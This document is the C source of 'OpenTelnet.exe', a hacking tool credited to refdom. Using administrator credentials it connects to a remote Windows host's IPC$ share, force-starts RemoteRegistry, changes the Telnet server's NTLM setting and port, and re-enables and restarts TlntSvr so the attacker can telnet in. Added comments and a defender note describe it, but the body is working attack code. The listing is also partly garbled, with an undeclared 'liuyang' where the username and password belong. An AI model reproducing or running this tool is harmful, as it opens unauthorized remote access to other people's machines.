opentelnet.exe原始碼(C語言版)
// OpenTelnet.exe \\\\server username password NTLMAuthtelnetport
#include <stdio.h>
#include <assert.h>
#include <windows.h>
#include <Winnetwk.h>
#include <Winreg.h>
#include <Shlwapi.h>
#pragma comment(lib, “Advapi32.lib”)
#pragma comment(lib, “Mpr.lib”)
/* Process-wide state shared between main() and the service helpers below. */
SC_HANDLE g_schSCManager; // handle to the target's service control manager, opened in main()
HKEY g_hKey; // HKEY_LOCAL_MACHINE on the target, from RegConnectRegistry() in main()
DWORD g_DefaultTelnetStartType; // TlntSvr start type before any change, saved by RestartTelnet()
DWORD g_DefaultRegistryStartType; // RemoteRegistry start type before any change, saved by StartRemoteRegistry()
LPBYTE g_lpDefaultTelnetNTLM; // original "NTLM" registry value, read in main()
LPBYTE g_lpDefaultTelnetPort; // original "TelnetPort" registry value, read in main()
void Usage(char*); // print banner and usage text
int RestartTelnet(); // stop TlntSvr if it is running, then start it; 1 on success, 0 on failure
int StartRemoteRegistry(); // make sure RemoteRegistry is running; 1 on success, 0 on failure
int MyStartService(SC_HANDLE, char*); // StartService() and wait for SERVICE_RUNNING; 1 on success, 0 on failure
/*
 * Entry point.  Arguments (see Usage()): server, username, password,
 * NTLM setting, telnet port.  Connects to the target's IPC$ share with the
 * supplied credentials, makes sure RemoteRegistry is running, rewrites the
 * TelnetServer NTLM/TelnetPort values, restarts TlntSvr and stores the
 * previous settings under default_* values for later restoration.
 * Always returns 0; success or failure is only reported through printf.
 *
 * Defender note: every step goes through the target's IPC$ share, remote
 * service control manager and remote registry with administrative access.
 * Restricting remote SCM/RemoteRegistry access and auditing service
 * configuration and TelnetServer key changes is what makes this class of
 * tool fail or stand out.
 */
int main(int argc, char* argv[])
{
int nRetCode;
char szIpc[50] = “”; // "<server>\ipc$", filled in below
HKEY hKey; // SOFTWARE\Microsoft\TelnetServer\1.0 on the target
LPSTR lpUserName, lpPassword;
NETRESOURCE NET;
DWORD dwNTLM, dwTelnetPort;
Usage(argv[0]); // print banner and usage text
// NOTE(review): argv[5] is read below, so this guard should be argc < 6;
// with exactly five arguments argv[5] is NULL and atoi(NULL) is undefined.
if (argc < 5)
return 0;
// NOTE(review): unbounded sprintf into a 50-byte buffer; a long server
// name overflows szIpc.
sprintf (szIpc, “%s\\\\ipc$”, argv[1]);
// NOTE(review): `liuyang` is not declared anywhere in this listing; the
// usage line implies these should come from argv[2] and argv[3].  The page
// text appears garbled here.
lpUserName = liuyang; // user name
lpPassword = liuyang; // password
NET.lpLocalName = NULL; // no local device name
NET.lpRemoteName = szIpc;
NET.dwType = RESOURCETYPE_ANY;
NET.lpProvider = NULL; // let the system pick the provider
printf (“Connecting %s”,argv[1]);
ReConnect:
// drop any IPC connection to the target that already exists
nRetCode = WNetCancelConnection2(szIpc, CONNECT_UPDATE_PROFILE, TRUE);
if (nRetCode == NO_ERROR)
printf (“Canncel Successfully!\\n”);
// establish the IPC connection with the supplied credentials
nRetCode = WNetAddConnection2(&NET, lpPassword, lpUserName, CONNECT_INTERACTIVE);
if (nRetCode == ERROR_ALREADY_ASSIGNED || nRetCode == ERROR_DEVICE_ALREADY_REMEMBERED)
{
printf (“Already conneted to the server!\\n”);
printf (“Now re-connecting the server\\n”);
goto ReConnect; // already connected: cancel and try again (no retry limit)
}
else if (nRetCode == NO_ERROR)
printf (“Successfully!\\n”); // connection established
else
{
printf (“\\n\\tErr:”);
switch (nRetCode) // error reporting
{
case ERROR_ALREADY_ASSIGNED: // unreachable here: handled by the branch above
case ERROR_ACCESS_DENIED:
printf (“ERROR_ACCESS_DENIED\\n”);
break;
case ERROR_BAD_NET_NAME:
printf (“ERROR_BAD_NET_NAME\\n”);
break;
default:
printf (“CONNECT ERR:%d!\\n”,GetLastError()); // prints GetLastError() rather than nRetCode
break;
}
return 0;
}
// open the target's service control manager
g_schSCManager = OpenSCManager(argv[1], NULL, SC_MANAGER_ALL_ACCESS);
if (g_schSCManager == NULL)
{
printf (“Open SCManager failed!\\n”);
return 0; // NOTE(review): this and the later error returns leave the IPC connection and open handles behind
}
// make sure the RemoteRegistry service is running before RegConnectRegistry()
if (!StartRemoteRegistry())
{
printf (“All Process Failed!\\n”);
return 0;
}
// connect to the target's HKEY_LOCAL_MACHINE
if (!(RegConnectRegistry((LPCTSTR) argv[1], HKEY_LOCAL_MACHINE, &g_hKey) == ERROR_SUCCESS))
{
printf (“Connect remote registry failed!\\n”);
return 0;
}
// open the telnet service configuration key
if (!(RegOpenKeyEx(g_hKey, “SOFTWARE\\\\Microsoft\\\\TelnetServer\\\\1.0”, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS))
{
printf (“Open key failed!\\n”);
return 0;
}
// read the current NTLM and TelnetPort values so they can be saved later
g_lpDefaultTelnetNTLM = (LPBYTE) LocalAlloc(LPTR, 50); // zeroed 50-byte buffers; never freed
g_lpDefaultTelnetPort = (LPBYTE) LocalAlloc(LPTR, 50);
DWORD dwDataSize = 50; // in/out buffer size for RegQueryValueEx
// read "NTLM" into g_lpDefaultTelnetNTLM (the author notes the default is 2);
// kept so the setting can be restored afterwards
if (!(RegQueryValueEx(hKey, “NTLM”, NULL, NULL, g_lpDefaultTelnetNTLM, &dwDataSize) == ERROR_SUCCESS))
{
printf (“Read NTLM failed!\\n ”);
return 0;
}
// read "TelnetPort" into g_lpDefaultTelnetPort (the author notes the default is 23);
// also kept for restoration.
// NOTE(review): dwDataSize is not reset to 50 here; after the first query it
// holds the size of the NTLM value actually read.
if (!(RegQueryValueEx(hKey, “TelnetPort”, NULL, NULL, g_lpDefaultTelnetPort, &dwDataSize) == ERROR_SUCCESS))
{
printf (“Read port failed!\\n ”);
return 0;
}
// new NTLM and port values from the command line
dwNTLM = atoi(argv[4]);
if (dwNTLM >= 3) // anything outside 0..2 is clamped to 1 (negative input becomes a large DWORD and lands here too)
{
dwNTLM = 1;
}
dwTelnetPort = atoi(argv[5]); // no range check on the port
// write the NTLM value
if (!(RegSetValueEx(hKey, “NTLM”, 0, REG_DWORD, (LPBYTE) &dwNTLM, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set NTLM value failed!”);
return 0;
}
// write the port value; return value is not checked
RegSetValueEx(hKey, “TelnetPort”, 0, REG_DWORD, (LPBYTE) &dwTelnetPort, sizeof(DWORD));
// restart the telnet service so the new values take effect
nRetCode = RestartTelnet();
if (nRetCode)
{
printf (“\\nBINGLE!!!Yeah!!\\n”);
printf (“Telnet Port is %d. You can try:\\”telnet ip %d\\“, to connect the server!”, dwTelnetPort, dwTelnetPort);
}
// store the previous settings under default_* values so a companion tool
// (the author names resumetelnet) can restore them.  These writes run even
// when RestartTelnet() failed; in that case g_DefaultTelnetStartType may
// still hold its zero-initialized value rather than the real start type.
if (!(RegSetValueEx(hKey, “default_NTLM”, 0, REG_DWORD, g_lpDefaultTelnetNTLM, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set defaultNTLM value failed!”);
return 0;
}
if (!(RegSetValueEx(hKey, “default_Port”, 0, REG_DWORD, g_lpDefaultTelnetPort, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set defaultPort value failed!”);
return 0;
}
if (!(RegSetValueEx(hKey, “default_TelnetStart”, 0, REG_DWORD, (LPBYTE) &g_DefaultTelnetStartType, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set defaulttelnetstart value failed!”);
return 0;
}
if (!(RegSetValueEx(hKey, “default_RegistryStart”, 0, REG_DWORD, (LPBYTE) &g_DefaultRegistryStartType, sizeof(DWORD)) == ERROR_SUCCESS))
{
printf (“Set defaultregistrystart value failed!”);
return 0;
}
RegCloseKey(hKey);
RegCloseKey(g_hKey); // close the registry handles (success path only)
// close the service control manager handle
CloseServiceHandle(g_schSCManager);
// drop the IPC connection
printf (“\\nDisconnecting server”);
// NOTE(review): cancels argv[1], while the connection was added under
// szIpc ("<server>\ipc$"); verify the name matches the connection made above.
nRetCode = WNetCancelConnection2(argv[1], CONNECT_UPDATE_PROFILE, TRUE);
if (nRetCode == NO_ERROR)
printf (“Successfully!\\n”);
else
printf (“Failed!\\n”);
return 0;
}
/*
 * Print the banner and usage text.
 * pcAppName: the program name as invoked (argv[0]); only echoed in the banner.
 */
void Usage(char* pcAppName) // print banner and usage text
{
printf (“*******************************************************\\n”);
printf (“Remote Telnet Configure, by refdom\\n”);
printf (“Email: ”); // address not present in this listing
printf (“%s\\n\\n”, pcAppName);
printf (“Usage:OpenTelnet.exe \\\\\\\\server username password NTLMAuthtelnetport\\n”);
printf (“*******************************************************\\n”);
return;
}
/*
 * Restart the TlntSvr service on the target through g_schSCManager.
 * Saves the current start type in g_DefaultTelnetStartType, switches a
 * disabled service to demand start, stops it if it is running, then starts
 * it via MyStartService().
 * Returns 1 on success, 0 on any failure.  On failure paths the service
 * handle and the config buffer are not released.
 */
int RestartTelnet() // restart the telnet service
{
DWORD dwWaitTime;
DWORD dwConfigSize;
SC_HANDLE schTelnetService;
SERVICE_STATUS ssTelnetStatus;
LPQUERY_SERVICE_CONFIG lpTelnetConfig;
printf (“\\nNOTICE!!!!!!\\n”);
printf (“The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23\\n\\n”);
// open the telnet service with full access
schTelnetService = OpenService(g_schSCManager, “TlntSvr”, SERVICE_ALL_ACCESS);
if (schTelnetService == NULL)
{
printf (“Open service failed!\\n”);
return 0;
}
// fixed 1024-byte buffer for QUERY_SERVICE_CONFIG; never freed
lpTelnetConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024);
if (lpTelnetConfig == NULL)
{
printf (“Alloc memory failed!\\n”);
return 0;
}
// fetch the service's current configuration
if (!QueryServiceConfig(schTelnetService, lpTelnetConfig, 1024, &dwConfigSize))
{
printf (“Query service congfig failed!\\n”);
return 0;
}
// remember the original start type so it can be written back later
g_DefaultTelnetStartType = lpTelnetConfig->dwStartType;
// a disabled service cannot be started; switch it to demand start
if (lpTelnetConfig->dwStartType == SERVICE_DISABLED)
{
if (!ChangeServiceConfig(schTelnetService,
SERVICE_NO_CHANGE,
SERVICE_DEMAND_START,
SERVICE_NO_CHANGE,
NULL, NULL, NULL, NULL, NULL, NULL, NULL))
{
printf (“Change service config failed!\\n”);
return 0;
}
}
// fetch the current service state
if (!(QueryServiceStatus(schTelnetService, &ssTelnetStatus)))
{
printf (“Query service status failed!\\n”);
return 0;
}
// if the service is not already stopped or stopping, stop it
if (ssTelnetStatus.dwCurrentState != SERVICE_STOPPED && ssTelnetStatus.dwCurrentState != SERVICE_STOP_PENDING)
{
printf (“Stopping telnet service ”);
if (!(ControlService(schTelnetService, SERVICE_CONTROL_STOP, &ssTelnetStatus)))
{
printf (“Control telnet service status failed!\\n”);
return 0;
}
// sleep for a while to give the service time to stop:
// a tenth of the service's wait hint, clamped to 1..10 seconds
dwWaitTime = ssTelnetStatus.dwWaitHint / 10;
if( dwWaitTime < 1000 )
dwWaitTime = 1000;
else if ( dwWaitTime > 10000 )
dwWaitTime = 10000;
Sleep(dwWaitTime);
// NOTE(review): a failed re-query only prints; the stale status from the
// ControlService() call is then tested below
if (!QueryServiceStatus(schTelnetService, &ssTelnetStatus))
{
printf (“Query service status failed!\\n”);
}
if ( ssTelnetStatus.dwCurrentState == SERVICE_STOPPED || ssTelnetStatus.dwCurrentState == SERVICE_STOP_PENDING)
{
printf (“Telnet service is stopped successfully!\\n”);
}
else
{
printf (“Stopping telnet service failed!\\n”);
return 0;
}
} // telnet service is now stopped (or stopping)
// start it again; "telnet" is only the display name used in messages
if (!MyStartService(schTelnetService, “telnet”))
return 0;
CloseServiceHandle(schTelnetService); // close the service handle
return 1;
}
/*
 * Make sure the RemoteRegistry service on the target is running, using
 * g_schSCManager.  Saves the current start type in
 * g_DefaultRegistryStartType, switches a disabled service to demand start,
 * and starts it via MyStartService() if it is not already running.
 * Returns 1 on success, 0 on any failure.  The config buffer is never
 * freed, and failure paths leave the service handle open.
 */
int StartRemoteRegistry() // start the remote registry service
{
SC_HANDLE schRegistryService;
SERVICE_STATUS ssRegistryStatus;
LPQUERY_SERVICE_CONFIG lpRegistryConfig;
DWORD dwConfigSize;
// fixed 1024-byte buffer for QUERY_SERVICE_CONFIG; allocated before the
// service is opened, so the OpenService failure path below leaks it
lpRegistryConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024);
if (lpRegistryConfig == NULL)
{
printf (“Alloc memory failed!\\n”);
return 0;
}
// open the RemoteRegistry service with full access
schRegistryService = OpenService( g_schSCManager, “RemoteRegistry”, SERVICE_ALL_ACCESS);
if (schRegistryService == NULL)
{
printf (“Open remote registry service failed!\\n”);
return 0;
}
// fetch the service's current configuration
if (!QueryServiceConfig(schRegistryService, lpRegistryConfig, 1024, &dwConfigSize))
{
printf (“Query registry service config failed!\\n”);
return 0;
}
// remember the original start type; a disabled service cannot be started,
// so switch it to demand start
g_DefaultRegistryStartType = lpRegistryConfig->dwStartType;
if (g_DefaultRegistryStartType == SERVICE_DISABLED)
{
if (!ChangeServiceConfig(schRegistryService,
SERVICE_NO_CHANGE,
SERVICE_DEMAND_START,
SERVICE_NO_CHANGE,
NULL, NULL, NULL, NULL, NULL, NULL,NULL))
{
printf (“Change registry service config failed!\\n”);
return 0;
}
}
// fetch the current service state
if (!QueryServiceStatus(schRegistryService, &ssRegistryStatus))
{
printf (“Query remote registry service failed!\\n”);
return 0;
}
// start the service only if it is not already running
if (ssRegistryStatus.dwCurrentState != SERVICE_RUNNING)
{
if (!MyStartService(schRegistryService, “remote registry”))
return 0;
}
CloseServiceHandle(schRegistryService);
return 1;
}
/*
 * Start an already-opened service and wait for it to reach SERVICE_RUNNING.
 * schService:    open service handle (needs start/query rights).
 * szServiceName: display name used only in printed messages.
 * While the service reports SERVICE_START_PENDING the function sleeps for a
 * tenth of the wait hint (clamped to 1..10 s) and re-queries; a checkpoint
 * that advances resets the timer, and no progress within dwWaitHint ends
 * the wait.
 * Returns 1 if the service ends up running, 0 otherwise.
 */
int MyStartService(SC_HANDLE schService, char* szServiceName) // start the given service
{
DWORD dwWaitTime;
DWORD dwOldCheckPoint;
DWORD dwStartTickCount;
SERVICE_STATUS ssStatus;
// ask the SCM to start the service (no arguments)
printf (“Starting %s service\\n”, szServiceName);
if (!(StartService(schService, 0, NULL)))
{
printf (“Starting %s service failed!\\n”, szServiceName);
return 0;
}
// fetch the current service state
// NOTE(review): on failure this only prints (the return is commented out)
// and the code below then reads ssStatus, which is uninitialized in that case
if (!(QueryServiceStatus(schService, &ssStatus)))
{
printf (“Query %s service status failed!\\n”,szServiceName);
// return ;
}
dwStartTickCount = GetTickCount(); // time of the last observed progress
dwOldCheckPoint = ssStatus.dwCheckPoint;
while ( ssStatus.dwCurrentState == SERVICE_START_PENDING)
{
// sleep for a tenth of the wait hint, clamped to 1..10 seconds
dwWaitTime = ssStatus.dwWaitHint / 10;
if( dwWaitTime < 1000 )
dwWaitTime = 1000;
else if ( dwWaitTime > 10000 )
dwWaitTime = 10000;
Sleep(dwWaitTime);
// re-query the state; give up on a query failure
if (!QueryServiceStatus(schService, &ssStatus))
break;
if ( ssStatus.dwCheckPoint > dwOldCheckPoint )
{
// the service is making progress: restart the timer
dwStartTickCount = GetTickCount();
dwOldCheckPoint = ssStatus.dwCheckPoint;
}
else
{
// DWORD subtraction, so a tick-count wrap still yields the elapsed time
if(GetTickCount()-dwStartTickCount > ssStatus.dwWaitHint)
{
// no progress within the service's suggested wait time
break;
}
}
}
if ( ssStatus.dwCurrentState == SERVICE_RUNNING )
{
printf (“%s service is started successfully! %s service is running!\\n”, szServiceName, szServiceName);
}
else
{
printf (“%s service is not started!\\n”, szServiceName);
return 0;
}
return 1;
}